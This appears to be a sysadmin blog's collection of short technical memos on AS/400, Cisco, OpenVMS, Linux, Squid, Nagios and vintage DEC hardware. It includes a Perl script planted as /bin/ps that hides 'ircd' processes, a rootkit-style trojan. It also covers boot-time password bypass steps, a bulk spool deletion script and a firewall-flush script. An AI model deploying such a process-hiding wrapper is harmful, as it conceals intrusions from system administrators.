WRKOUTQD Work with OUTQ Description
WRKOVL Work with Overlays
WRKPAGDFN Work with Page Definitions
WRKPAGSEG Work with Page Segments
WRKPARTPDM Work with Parts Using PDM
WRKPCLTBLE Work with Protocol Table Entry
WRKPFCST Work with PF Constraints
WRKPFRCOL Work with Pfr Collection
WRKPGM Work with Programs
WRKPGMTBL Work with Program Tables
WRKPNLGRP Work with Panel Groups
WRKPRB Work with Problem
WRKPRDINF Work with Product Information
WRKPRJPDM Work with Projects Using PDM
WRKPRTSTS Work with Printing Status
WRKPSFCFG Work with PSF Configuration
WRKQMFORM Work with Query Mgmt Forms
WRKQMQRY Work with Query Mgmt Queries
WRKQRY Work With Queries
WRKQST Work with Questions
WRKRDBDIRE Work with RDB Directory Entry
WRKRDR Work with Readers
WRKREGINF Work with Registration Info
WRKRJESSN Work with RJE Session
WRKRMTDFN Work with Remote Definitions
WRKRPYLE Work with Reply List Entries
WRKRTDCFG Work with RouteD Configuration
WRKS36 Work with S/36 Configuration
WRKS36PGMA Work with S/36 Program Attr
WRKS36PRCA Work with S/36 Procedure Attr
WRKS36SRCA Work with S/36 Source Attr
WRKSBMJOB Work with Submitted Jobs
WRKSBS Work with Subsystems
WRKSBSD Work with Subsystem Desc
WRKSBSJOB Work with Subsystem Jobs
WRKSCHIDX Work with Search Indexes
WRKSCHIDXE Work Search Index Entry
WRKSHRPOOL Work with Shared Storage Pools
WRKSOC Work with Sphere of Control
WRKSPADCT Work with Spelling Aid Dict
WRKSPLF Work with Spooled Files
WRKSPLFA Work with Spooled File Attr
WRKSRVPGM Work with Service Program
WRKSRVPVD Work with Service Providers
WRKSRVTBLE Work with Service Table Entry
WRKSSND Work with Session Description
WRKSYSACT Work with System Activity
WRKSYSSTS Work with System Status
WRKSYSVAL Work with System Value
WRKTAPCTG Work with Tape Cartridge
WRKTBL Work with Tables
WRKTCPPTP Work with Point-to-Point TCPIP
WRKTCPSTS Work with TCP/IP Network Sts
WRKTIE Work with TIE
WRKUSRJOB Work with User Jobs
WRKUSRPRF Work with User Profiles
WRKUSRTBL Work with User Tables
WRKWTR Work with Writers

AS400 – Commands Read More »

RDP – Remote logins are currently disabled.

If you trying to connect to a RDP server and you get this error:

Error message: Terminal Server sessions disabled. Remote logins are currently disabled.

Terminal Server sessions disabled. Remote logins are currently disabled.
Description: The user is attempting to log on to a Terminal Server where an administrator has disabled logon by issuing the CHANGE LOGON /DISABLE command. In order to enable logon, the CHANGE LOGON /ENABLE command must be issued.

RDP – Remote logins are currently disabled. Read More »

Linux – Removing all IP information from an interface

If an interface has already had IP addresses assigned to it, and all of the addresses need to be removed (along with their routes), there is one handy command to accomplish all of these tasks. ip address flush takes an interface name as an argument. Let’s look at the output of ip address show just before and just after removing all IPs.

[root@logistic]# ip address show dev eth0
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 100
link/ether 00:80:c8:f8:4a:51 brd ff:ff:ff:ff:ff:ff
inet 192.168.99.35/24 brd 192.168.99.255 scope global eth0
inet 192.168.99.37/24 brd 192.168.99.255 scope global secondary eth0:0
[root@logistic]# ip address flush
Flush requires arguments.
[root@logistic]# ip address flush dev eth0
[root@logistic]# ip address show dev eth0
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 100
link/ether 00:80:c8:f8:4a:51 brd ff:ff:ff:ff:ff:ff

Linux – Removing all IP information from an interface Read More »

pSeries – 10117611 U0.1-F1

I’m getting this error on a 9114-275.

SYSTEM POWER CONTROL MENU

1. Enable/Disable Unattended Start Mode:
Currently Enabled

2. Ring Indicate Power-On Menu
3. Reboot/Restart Policy Setup Menu
4. Power-On System
5. Power-Off System
6. Enable/Disable Fast System Boot:
Currently Slow Boot

7. Boot Mode Menu
98. Return to Previous Menu
99. Exit from Menus

After digits “4”

Please wait....

System Powering On. Exiting menus.
9022
9101
90FD
10117611 U0.1-F1
B0FF
OK x

The error on planar was located on FAN module, for resolution unplug entire block and single fans, then replug into the planar after cleaning up, then power on your pSeries.

pSeries – 10117611 U0.1-F1 Read More »

Netmask Conversion

Bitmask (Bits) Dotted Decimal Hexadecimal Binary
/0 0.0.0.0 0x00000000 00000000 00000000 00000000 00000000
/1 128.0.0.0 0x80000000 10000000 00000000 00000000 00000000
/2 192.0.0.0 0xc0000000 11000000 00000000 00000000 00000000
/3 224.0.0.0 0xe0000000 11100000 00000000 00000000 00000000
/4 240.0.0.0 0xf0000000 11110000 00000000 00000000 00000000
/5 248.0.0.0 0xf8000000 11111000 00000000 00000000 00000000
/6 252.0.0.0 0xfc000000 11111100 00000000 00000000 00000000
/7 254.0.0.0 0xfe000000 11111110 00000000 00000000 00000000
/8 255.0.0.0 0xff000000 11111111 00000000 00000000 00000000
/9 255.128.0.0 0xff800000 11111111 10000000 00000000 00000000
/10 255.192.0.0 0xffc00000 11111111 11000000 00000000 00000000
/11 255.224.0.0 0xffe00000 11111111 11100000 00000000 00000000
/12 255.240.0.0 0xfff00000 11111111 11110000 00000000 00000000
/13 255.248.0.0 0xfff80000 11111111 11111000 00000000 00000000
/14 255.252.0.0 0xfffc0000 11111111 11111100 00000000 00000000
/15 255.254.0.0 0xfffe0000 11111111 11111110 00000000 00000000
/16 255.255.0.0 0xffff0000 11111111 11111111 00000000 00000000
/17 255.255.128.0 0xffff8000 11111111 11111111 10000000 00000000
/18 255.255.192.0 0xffffc000 11111111 11111111 11000000 00000000
/19 255.255.224.0 0xffffe000 11111111 11111111 11100000 00000000
/20 255.255.240.0 0xfffff000 11111111 11111111 11110000 00000000
/21 255.255.248.0 0xfffff800 11111111 11111111 11111000 00000000
/22 255.255.252.0 0xfffffc00 11111111 11111111 11111100 00000000
/23 255.255.254.0 0xfffffe00 11111111 11111111 11111110 00000000
/24 255.255.255.0 0xffffff00 11111111 11111111 11111111 00000000
/25 255.255.255.128 0xffffff80 11111111 11111111 11111111 10000000
/26 255.255.255.192 0xffffffc0 11111111 11111111 11111111 11000000
/27 255.255.255.224 0xffffffe0 11111111 11111111 11111111 11100000
/28 255.255.255.240 0xfffffff0 11111111 11111111 11111111 11110000
/29 255.255.255.248 0xfffffff8 11111111 11111111 11111111 11111000
/30 255.255.255.252 0xfffffffc 11111111 11111111 11111111 11111100
/31 255.255.255.254 0xfffffffe 11111111 11111111 11111111 11111110
/32 255.255.255.255 0xffffffff 11111111 11111111 11111111 11111111

Netmask Conversion Read More »

Cisco – service config

Randomly, during bootup of Cisco hardware (IOS), error messages similar to these are displayed:

%Error opening tftp://255.255.255.255/network-confg (Socket error)

%Error opening tftp://255.255.255.255/cisconet.cfg (Socket error)

%Error opening tftp://255.255.255.255/hostname-confg (Socket error)

%Error opening tftp://255.255.255.255/hostname.cfg (Socket error)

These error messages are related to the default service configuration option built into Cisco IOS software, which attempts to access the service configuration files from a network Trivial File Transfer Protocol (TFTP) server.

In order to disable this feature, issue the no service config global command.

Router#config terminal
Enter configuration commands, one per line.

Router(config)#no service config

Router(config)#exit

Router#copy running-config startup-config

Cisco – service config Read More »

Cisco – ATM Clockrate

If you have performance problem on Cisco 1721, Cisco 2610XM-2651XM, Cisco 2691, and Cisco 3660, with WIC-1DSL – IOS 12.3(2) or above, probably depends on the default value associated with ALL5 clockrate.

If yuo wanna check type the following command on your router:

hellroute01#show controller atm0/0 | include ATM0/0
Interface: ATM0/0, Hardware: DSLSAR (with Alcatel ADSL Module), State: up
SCC0 = 2600000 (ATM0/0)
SCC3 = 1000000 (ATM0/0)
hellroute01#

If you get 2600000 (default value) on SCC0 or SCC1 your downlink speed rate probably is limitated at about 300 KB/s

For get full speed, put max supported value on aal5 clockrate like this:

hellroute01(config)#int atm0/0
hellroute01(config-if)#clock rate aal5 ?
1000000
1300000
1600000
2000000
2600000 (default)
3200000
4000000
5300000
7000000

<1000000-7000000> clock rates in bits per second, choose one from above

hellroute01(config-if)#clock rate aal5 7000000

Becareful the atm interface is automatically restart for apply the change. Then you lost connection on this interface.

Cisco – ATM Clockrate Read More »

OpenVMS – IPv6

Memo about configure ipv6 on OpenVMS system as host mode:

First of all invoke the TCPIP$IP6_SETUP command procedure by entering the following command:

TARDIS::LEO$ @SYS$MANAGER:TCPIP$IP6_SETUP

Leaving default option to all question, in this mode the dcl create default configuration script.

Then edit the inet6 script:

TARDIS::LEO$ EDIT SYS$SYSTEM:TCPIP$INET6_CONFIG.DAT

After the “up” command

$ ifconfig "IE0" ipv6 up

Append the following line with ip and default gateway:

$ ifconfig "IE0" inet6 ip6prefix 2001:1418:0193:0001::40/64
$ route add -inet6 default 2001:1418:0193:0001::250 -"I" "IE0"

Save, exit and run the dcl:

TARDIS::LEO$ @SYS$SYSROOT:[SYSEXE]TCPIP$INET6_CONFIG.DAT

OpenVMS – IPv6 Read More »

CentOS – IPv6 interface

You need to update and configure following files for IPv6 configuration:

1. Edit: /etc/sysconfig/network

And append following line, to enable in systemwide the ipv6 protocol:

NETWORKING_IPV6=yes

2. Edit: /etc/sysconfig/network-scripts/ifcfg-eth1 (or your interface number)

And append following line, to enable ipv6 on interface and the address/gateway if you use static routing:

IPV6INIT=yes
IPV6ADDR=2001:1418:0193:000B::210
IPV6_DEFAULTGW=2001:1418:0193:000B::251

Save, close and restart network service:

# service network restart

CentOS – IPv6 interface Read More »

Neoware Thin Client – Password Recovery

Personally I tried this procedure on Neoware e140 wich run Neolinux 2.x but i think it’s the some with other models or os version:

1. Power on the thin client

2. Press ‘SHIFT’ during boot procedure

3. Now you can get LILO prompt, type: ‘vga simple’ (I have tried without success to run directly init=/bin/bash the system start but don’t load correctly the filesystem on flashdrive)

4. After kernel starting up procedure you can’t see nothing, then you can jump on terminal 2 pressing ‘ALT + F2’

5. Now on bash# prompt simply digit ‘passwd’ for setup new password

6. Reboot the system and use your new password

Neoware Thin Client – Password Recovery Read More »

GRUB – Init Shell

Sometime in case of root password lost or file system corruption, you need to boot system with simple shell, skipping the init sequence.

1. At Grub prompt press ‘e’ to edit command before booting.

2. Select ‘kernel’ line

3. Press ‘e’ again to edit selected command

4. Type follow at end of the line: init=/bin/bash (or sh)

5. Press ‘b’ to boot system

6. Now you are at shell prompt. Enjoy

GRUB – Init Shell Read More »

Linux – dmidecode

dmidecode is a tool for dumping a computer’s DMI (some say SMBIOS) table contents in a human-readable format. This table contains a description of the system’s hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision.
If you like to see which memory banks is in use and what the ram module sizes, you simply call dmidecode with memory parameter.

# dmidecode -t memory

dmidecode also gives you information about your system’s cache, bios and cpu.
Here is a sample output for processor:

# dmidecode -t processor

information about your system cache

# dmidecode -t cache

bios information includes vendor of your bios and it’s version. Also, which devices are supported and which ones can be use for booting up your system.

# dmidecode -t bios

Linux – dmidecode Read More »

PHP & FlickrAPI – Photo wall

I wrote a simple code/class for automatic get photos from flickr photostream (by service API)  to compose randomly a nice miniature photowall (you can see an example on my homepage).

First of all you can need API code (only key, we don’t need secret authentication).

Now the code, my class file was called lib/fget.php in here we define variable, class and function construct:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
class Flickr {
//API Key you can get them on http://www.flickr.com/services/apps/create/apply/
private $apiKey = 'xxxx';
//We define our numeric username http://www.flickr.com/services/api/explore/?method=flickr.people.getInfo
private $NSID = '29479498@N05';
//File per page (max file 200 for free account)
private $ppage = '200';public function __construct() {
}public function retrive() {
//For get data we use REST method and serialize option
$getdata = 'http://flickr.com/services/rest/?method=flickr.photos.search&api_key=' . $this->apiKey . '&user_id=' . $this->NSID . '&per_page=' . $this->ppage . '&format=php_serial';
//Get the data
$result = file_get_contents($getdata);
//De serialize for array use
$result = unserialize($result);
return $result;
}
}
?>

Now include the class into a sample page:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
//Include the class
require_once('lib/fget.php');
//Recall the class
$Flickr = new Flickr;
//Retrive data array
$data = $Flickr->retrive();
//Randomize data
shuffle($data['photos']['photo']);
//Define 0 to the counter (we need this some line down here)
$count = 0;
?>
 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<head>
<title>deepreflect.net</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="index.css" rel="stylesheet" type="text/css">
</head>
<body>
<p>
<a href="home.php">
<?php
 
        foreach($data['photos']['photo'] as $photo) { 
        //URL base format for all photo, if you wanna miniature you can modify .jpg into _s.jpg
        // http://farm{farm-id}.static.flickr.com/{server-id}/{id}_{secret}.jpg
 
        //print photo sequence:
	echo '<img alt="click to Enjoy..." src="http://farm' . $photo["farm"] . '.static.flickr.com/' . $photo["server"] . '/' . $photo["id"] . '_' . $photo["secret"] . '_s.jpg">'; 
	//Start the counter
	$count++;
	//Every 13 create a new line
	if ($count == 13) echo '<br>';
	if ($count == 26) echo '<br>';
	if ($count == 39) echo '<br>';
	if ($count == 52) echo '<br>';
	if ($count == 65) echo '<br>';
	if ($count == 78) echo '<br>';
	//Limit print results to 91 photo
	if ($count == 91) break;
}
?>
</a>
</p>
</body>
</html>

PHP & FlickrAPI – Photo wall Read More »

Squid – Radius auth

In this example a squid installation will use RADIUS “squid_radius_auth” Squid RADIUS authentication helper to authenticate users.

Get last version of squid radius auth helper at:
http://www.squid-cache.org/contrib/squid_radius_auth/

Download:

[leo@srv01 leo]# wget http://www.squid-cache.org/contrib/squid_radius_auth/squid_radius_auth-1.10.tar.gz

Extract:

[leo@srv01 leo]# tar -xvf squid_radius_auth-1.10.tar.gz

Go to directory:

[leo@srv01 leo]# cd squid_radius_auth-1.10

Compile:

[leo@srv01 squid_radius_auth-1.10]# make
gcc -O2 -Wall -g -c -o squid_rad_auth.o squid_rad_auth.c
gcc -O2 -Wall -g -c md5.c
gcc -O2 -Wall -g -c util.c
gcc -g -o squid_radius_auth squid_rad_auth.o md5.o util.o

Now the installation, for my needs, I wanna keep binary into /usr/lib/squid/ and configuration file into /etc/squid/ and I don’t wanna take man files then edit Make.inc like this:

BINDIR = /usr/lib/squid
CONFDIR = /etc/squid

install: squid_radius_auth
mkdir -p $(BINDIR)
install -m 755 -s squid_radius_auth $(BINDIR)/squid_radius_auth
# mkdir -p $(DESTDIR)$(MANDIR)
# install -m 755 squid_radius_auth.8 $(DESTDIR)$(MANDIR)/squid_radius_auth$(MANEXT)
mkdir -p $(CONFDIR)
install -m 644 etc/squid_radius_auth.conf $(CONFDIR)/squid_radius_auth.conf.default
if ! test -f $(CONFDIR)/squid_radius_auth.conf; then \
cp -p $(CONFDIR)/squid_radius_auth.conf.default $(CONFDIR)/squid_radius_auth.conf; \
fi

Edit config file /etc/squid/squid_radius_auth.conf here my example:

server 10.255.X.X
secret XXXXXXXX
port 1645

Now you can test the helper, execute and then type your radius username/password on the same line separated with space, on successful authentication it will give “OK” otherwise “ERR login failure”

[leo@srv01 leo]# /usr/lib/squid/squid_radius_auth -f /etc/squid/squid_radius_auth.conf
leo xxxx
OK

Now you can made change to “squid.conf”

# TAG: auth_param
auth_param basic program /usr/lib/squid/squid_radius_auth -f /etc/squid/squid_radius_auth.conf
auth_param basic children 5
auth_param basic realm Wide-NET-Proxy
auth_param basic credentialsttl 5 minute
auth_param basic casesensitive on

# TAG: acl
acl radius-auth proxy_auth REQUIRED

# TAG: http_access
http_access allow localhost
http_access allow radius-auth
http_access deny all

Squid – Radius auth Read More »

OpenVMS – Set Time

The command to reset the system time to 18-APR-2010 09:47 is:

$ SET TIME=18-APR-2010:09:47

Note the colon between the date and the time specification. (This
extra colon is a requirement resulting from the DCL parsing rules.
Normally, there is a space between the date and time.)

On OpenVMS VAX, once a year between January 1st and circa April 11th,
or whenever a different SYS.EXE system image is bootstrapped, issue the
command:

$ SET TIME

to resynchronize the VAX time-of-year (TOY) clock and the contents of
the OpenVMS VAX system image. (This SET TIME command is automatically
performed during a normal system shutdown.) The TOY clock stores (only)
the time since January 1 00:00:00.00 of the current year, and has a
maximum resolution of roughly 466 days. The system image is used as the
storage location for the current year. Between these two values, the
current time and date is “constructed” during the OpenVMS VAX system
bootstrap. (And this is the reason the saved time value in the system
image must be reset every year between January and April.)

The SYSGEN parameter SETTIME can be used to enable prompting for the
system time during the system bootstrap.

OpenVMS – Set Time Read More »

Nagios – Twitter alerts

This entry will cover how to send nagios alerts to twitter, in the examples to follow using curl.

Firstly edit commands.cfg

And add the two following line:

define command {
command_name notify-by-twitter
command_line /usr/bin/curl --basic --user "twitteruser:twitterpassword" --data-ascii "status=[Nagios] $NOTIFICATIONTYPE$ $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$" http://twitter.com/statuses/update.json
}

define command {
command_name host-notify-by-twitter
command_line /usr/bin/curl --basic --user "twitteruser:twitterpassword" --data-ascii "status=[Nagios] $HOSTSTATE$ alert for $HOSTNAME$" http://twitter.com/statuses/update.json
}

Now define a contact for this twitter service into: contacts.cfg

define contact{
contact_name twitter
service_notification_commands notify-by-twitter
host_notification_commands host-notify-by-twitter
service_notification_period 24x7
host_notification_period 24x7
service_notification_options a
host_notification_options a
}

Add this contact into your existing contact groups like this (in contacts.cfg):

define contactgroup{
contactgroup_name admins
alias Nagios Administrators
members nagiosadmin,sms_alert,twitter
}

Then run a nagios prefly check to ensure you have no syntax errors, and restart nagios.

Nagios – Twitter alerts Read More »

OpenVMS – Command line editing

DCL implements command line editing and recall, so that users can more easily correct typing errors and reuse previous command lines.

Recall buffer: access to recently issued commands

$ RECALL string Bring up last command beginning with string.
$ RECALL/ALL Displays all commands and their numbers.
$ RECALL number Use a number found in RECALL/ALL.

Command line editing (if it isn’t on, do: $ SET TERM/LINE):

$ {up-arrow} Previous command in recall buffer.
$ {down-arrow} Next command in recall buffer.
$ {Ctrl A} Toggle insert/overstrike editing.
$ {Ctrl D} Move one character left.
$ {Ctrl E} Move to the end of the line.
$ {Ctrl F} Move one character right.
$ {Ctrl H} Move to the beginning of the line.
$ {Ctrl J} Delete word left of cursor.
$ {Ctrl R} Rewrite the command line.
$ {Ctrl U} Delete line left of cursor.
$ {Ctrl X} Cancel the current command line.

Miscellaneous:

$ {Ctrl 3} ASCII code for {Esc}.
$ {Ctrl I} ASCII code for {Tab}.
$ {Ctrl Z} Tell DCL "end of file". Used in some programs
to indicate more general sorts of "end" commands.

Of these, only {Ctrl I} will insert a character into the command line,
rather than just move the cursor around. No new characters may be
inserted before a tab ({Ctrl I}) in a command line, but existing characters
may be changed in overstrike mode, or deleted. This behavior is documented in the “I/O User’s Guide” and has existed since VMS 4.0.

OpenVMS – Command line editing Read More »

MSTSC – Admin session

Memo per il Giaco:

Syntax
MSTSC option
MSTSC /Edit"ConnectionFile"
MSTSC /migrate

Options
ConnectionFile The name of an RDP file for connection

/v: The remote computer to connect to

/console Connect to the console of a server (NT/XP)
/Admin Connect to a session for administering the server(Vista/2008)

/f Start in Full Screen mode

/w:width Width of the RDP screen
/h:height Height of the RDP screen

/span Match the Remote Desktop width and height with the local virtual
desktop, spanning across multiple monitors if necessary.(Vista/2008)

/public Run Remote Desktop in public mode. (Vista/2008)
In public mode, passwords and bitmaps are not cached.

/edit Open the RDP file for editing.
/migrate Convert a legacy Client connection file into an .RDP file

MSTSC – Admin session Read More »

Exim – Spool destroyer

In case of massive spam attack.

#!/bin/bash
ls /var/spool/exim/input/ > /tmp/delspoorexim
declare -a ARRAY
exec 10< /tmp/delspoorexim
let count=0
while read dels <&10; do
rm -fr /var/spool/exim/input/$dels
echo $dels
ARRAY[$count]=$dels
((count++))
done
echo Number operation done: ${#ARRAY[@]}
#echo ${ARRAY[@]}
exec 10>&-
rm /tmp/delspoorexim

Exim – Spool destroyer Read More »

OpenVMS – SYS$BATCH Queue

Little memo about sys$batch queue:

If no queue manger set:

$ DEFINE/SYSTEM/EXECUTIVE_MODE QMAN$MASTER DKA100:[QUEMAN]
$ START/QUEUE/MANAGER DKA100:[SYSQUE]

Problem:

$ SHOW QUEUE SYS$BATCH
%JBC-E-NOSUCHQUE, no such queue

Resolution:

$ INIT/QUE/BATCH SYS$BATCH

Problem:

$ SHOW QUEUE SYS$BATCH
%JBC-E-JOBQUEDIS, system job queue manager is not running

Resolution:

$ START/QUE SYS$BATCH

Full Reset:

$ STOP/QUE SYS$BATCH
$ DELETE/QUE SYS$BATCH
$ INIT/QUE/BATCH SYS$BATCH

More info:
OpenVMS System Manager’s Manual
Chapter 13
Managing the Queue Manager and Queue Database

OpenVMS – SYS$BATCH Queue Read More »

Solaris – Add swap to ZFS disk

I installed Solaris 10 05/09 on a machine and I used whatever the default swap space setting when I built the box. Now I need to increase the swap space and I can’t add a swap file, like was possible under UFS.

If your swap device is in use, then you might not be able to delete it. Check to see if the swap area is in use. For example:

$ swap -l
swapfile dev swaplo blocks free
/dev/zvol/dsk/rpool/swap 182,2 8 4194296 4194296

In the above output, blocks == free, so the swap device is not actually being used.

If the swap area is not is use, remove the swap area. For example:

$ swap -d /dev/zvol/dsk/rpool/swap

Confirm that the swap area is removed.

$ swap -l

No swap devices configured

Resize the swap volume. For example:

$ zfs set volsize=1G rpool/swap

Activate the swap area.

$ swap -a /dev/zvol/dsk/rpool/swap

$ swap -l
swapfile dev swaplo blocks free
/dev/zvol/dsk/rpool/swap 182,2 8 2097144 2097144

Solaris – Add swap to ZFS disk Read More »

DEC 3000 Alpha – Firmware Upgrade

>>> boot esa0
INIT-S-CPU...
INIT-S-ASIC...
INIT-S-MEM...
INIT-S-NVR...
INIT-S-CXT...
INIT-S-SCC...
INIT-S-NI...
INIT-S-SCSI...
INIT-S-ISDN...
AUDIT_BOOT_STARTS ...
AUDIT_BOOT_REQ
AUDIT_BOOT_RETRY
AUDIT_BOOT_RETRY
AUDIT_BOOT_RETRY
AUDIT_BOOT_RETRY
AUDIT_BSERVER_FOUND
AUDIT_LOAD_BEGINS
AUDIT_LOAD_DONE
*** FIRMWARE UPDATE UTILITY V2.6a ***
*** SYSTEM TYPE: M300 ***
UPDATE
VERIFY
LIST
SHOW
?
UPD-> update
Read IO ROM Device ID
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
Read System ROM Device ID
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
UPDATE SYSTEM ROM DEVICE
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
FIRMWARE REVISION: V7.0 LENGTH: 0x352e4 -> 217828 BYTES CHECKSUM: 0x1c
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
UPD-I *** ROM CONTENTS WILL BE DESTROYED ***
UPD-I ARE YOU READY TO PROGRAM DEVICE ? (Y/N ) y
UPD-I PRECHARGING DEVICE
................................................................
UPD-I ERASING ROM DEVICE
................................................................
UPD-I PROGRAMMING DEVICE
.....................................................
UPD-I PROGRAMMING COMPLETED
...........................
SYSTEM ROM UPDATE SUCCESSFUL
UPDATE IO ROM DEVICE
UPD-I VERIFY LOADED ROM IMAGE
...........................
UPD-I VERIFY LOADED ROM IMAGE DONE
FIRMWARE REVISION: V7.0 LENGTH: 0x34da8 -> 216488 BYTES CHECKSUM: 0x59
MANUFACTURER = INTEL (0x89)
DEVICE CODE = 28F020 (0xbd) 256K x 8
UPD-I PRECHARGING DEVICE
................................................................
UPD-I ERASING ROM DEVICE
................................................................
UPD-I PROGRAMMING DEVICE
....................................................
UPD-I PROGRAMMING COMPLETED
...........................
IO ROM UPDATE SUCCESSFUL
UPD->
UPD-> ?
UPDATE:
Update the ROMs. Jumpers MUST be installed on both roms.
For example
UPD->update

VERIFY [DEVICE]:
Verify the ROM[s]. If no qualifiers then all ROMS verified
The Checksum of file image is compared with rom image
For example
UPD->verify
UPD->verify system
UPD->verify io

SHOW [DEVICE]:
Show the current ROM Revision
For example
UPD->show
UPD->show system
UPD->show io

LIST :
List the supported ROM Devices
For example
UPD->list
*** ROM Devices Supported ***
SYSTEM: KN15-AA CPU Module 28F020 256Kx8 FLASH MEMORY
IO: IO-XXX I/O Module 28F020 256Kx8 FLASH MEMORY

*** FIRMWARE UPDATE UTILITY V2.6a ***
*** SYSTEM TYPE: M300 ***
UPDATE
VERIFY
LIST
SHOW
?
UPD->

DEC 3000 Alpha – Firmware Upgrade Read More »

Vodafone ITA – Call Forwarding

If your phone (example iPhone) doesn’t have complete call forwarding menu, you can use line code, then, to activate and deactivate Call Forwarding, follow this instructions:

Call Forward Immediate – Send all calls to another number instantly.
enable: **21* (prefix + number) # call
disable: ## 21 # call
verify: * # 21 # call

Call Forward No Reply – Send calls that go unanswered.
enable: **61* (prefix + number) # call
disable: ## 61 # call
verify: * # 61 # call

Call Forward Not Reachable conditions – Send calls elsewhere if your phone is off or not in the service area.
enable: **62* (prefix + number) # call
disable: ## 62 # call
verify: * # 62 # call

Call Forward Busy – Send calls that reach a busy signal to another number.
enable: **67* (prefix + number) # call
disable: ## 67 # call
verify: * # 67 # call

To forward call to the operator Voice Mail use: international prefix + your three digit prefix + 20

Vodafone ITA – Call Forwarding Read More »

Securing “tmp” without repartition

1. First you should secure /tmp:

Make a 1GB file for /tmp parition and an ext3 filesystem for tmp:

# dd if=/dev/zero of=/dev/tmpFS bs=1024 count=1000000
# /sbin/mkfs.ext3 /dev/tmpFS

Create a backup copy of your current /tmp drive:

# cp -Rpf /tmp /tmpbackup

Mount our new tmp parition and change permissions:

# mount -o loop,noexec,nosuid,rw /dev/tmpFS /tmp
# chmod 1777 /tmp

Copy the old data:
cp -Rpf /tmpbackup/* /tmp/

If you run the mount command and you should get something like this:
/dev/tmpMnt on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)

Edit /etc/fstab and add this:

/dev/tmpMnt /tmp ext3 loop,nosuid,noexec,rw 0 0

Test your fstab entry:

# mount -o remount /tmp

You can test it runnig a script on /tmp partition, if you get “permission denied” it is fine :)

2. Secure /var/tmp:

It should be done because some applications use /var/tmp as the temporary folder, and anything that’s accessible by all, needs to be secured.

Rename it and create a symbolic link to /tmp:

# mv /var/tmp /var/tmp1
# ln -s /tmp /var/tmp

Copy the old data back:

# cp /var/tmpold/* /tmp/

Note: you should restart and services that uses /tmp partition

Securing “tmp” without repartition Read More »

Debian NetInstall – Sparc

Per prima cosa è necessario avere un host linux nel mio caso Debian, e poi ovviamente una Sparc :)

Sull’host linux è necessario avere un server rarp e tftp quindi installiamo in questo modo:

vm01:~# apt-get install rarpd tftpd-hpa

Configuriamo rarpd, editando il seguente file /etc/ethers inserendo una riga con mac address della sparc (si può vedere appena accesa da OpenBoot):

XX:XX:XX:XX:XX:XX 192.168.xx.xx


Riavviamo per applicare le modifiche:

vm01:~# /etc/init.d/rarpd restart

OpenBoot all’avvio una volta ricevuto l’ip cercherà l’immagine nel tftp on notazione decimale, ammettendo che l’ip sia 192.168.101.9 effettuiamo la conversione in questo modo:

vm01:~# printf "%.2X%.2X%.2X%.2X\n" 192 168 101 9
C0A86509

Scarichiamo quindi l’immagine di netinstall di debian, e creiamo un link simbolico con la notazione decimale:

vm01:~# cd /var/lib/tftpboot
vm01:~# wget ftp://ftp.debian.org/debian/dists/stable/main/installer-sparc/current/images/netboot/boot.img
vm01:~# ln -s boot.img C0A86509

Successivamente da Sparc all’avvio, premere Stop-A o Break per mostrare il prompt di OpenBoot (“ok “) e digitare

boot net

Debian NetInstall – Sparc Read More »

Securing /dev/shm

Edit your /etc/fstab:

# vi /etc/fstab

change:

none /dev/shm tmpfs defaults,rw 0 0

to

none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0

Remount /dev/shm:

# mount -o remount /dev/shm

You can test it runnig a script on /dev/shm, if you get “permission denied” it is fine!

Securing /dev/shm Read More »

ProFTP(D) – listen on single ip

I don’t use ftp, but wordpress comes with this nice feature to upgrade plugins automatically from the web admin interface that needs ftp.

the problem is I don’t want to enable the ftp service and make it available to the rest of the world just for that.

So I needs the following two options in proftpd.conf:

DefaultAddress 127.0.0.1
SocketBindTight on

Now restart proftpd and you’re done.

ProFTP(D) – listen on single ip Read More »

Iptables Flush

Full flush iptables script:

#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Iptables Flush Read More »

Bastard code. (1)

srv:/bin# cat ps
#!/usr/bin/perl
use warnings;
use strict;

my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(ircd)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(ircd)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}

Bastard code. (1) Read More »

VAX – MMJ DEC423 Pinout

Setting up serial connection to VAXstation 4000/60:

First made a serial cable, attention Vax use a DEC423 serial port designed for long distant terminal line:

--------------- 1 - DTR (Data terminal ready)
I             I 2 - TxD (Transmit data)
I 1 2 3 4 5 6 I 3 - GND (Signal ground)
I             I 4 - RxC (Receive common)
I             I 5 - RxD (Receive data)
---------I____I 6 - DSR (Data set ready)

Pin 2 of the phone connector goes to Rx pin of the serial (3 of DB25 or 2 of DB9), pins 3 & 4 go to ground (7 of DB25 or 5 of DB9), and pin 5 goes to Tx pin (2 of DB25 or 3 of DB9).

Then, make sure that the S3 switch (on the front of the 4000/60) is set to
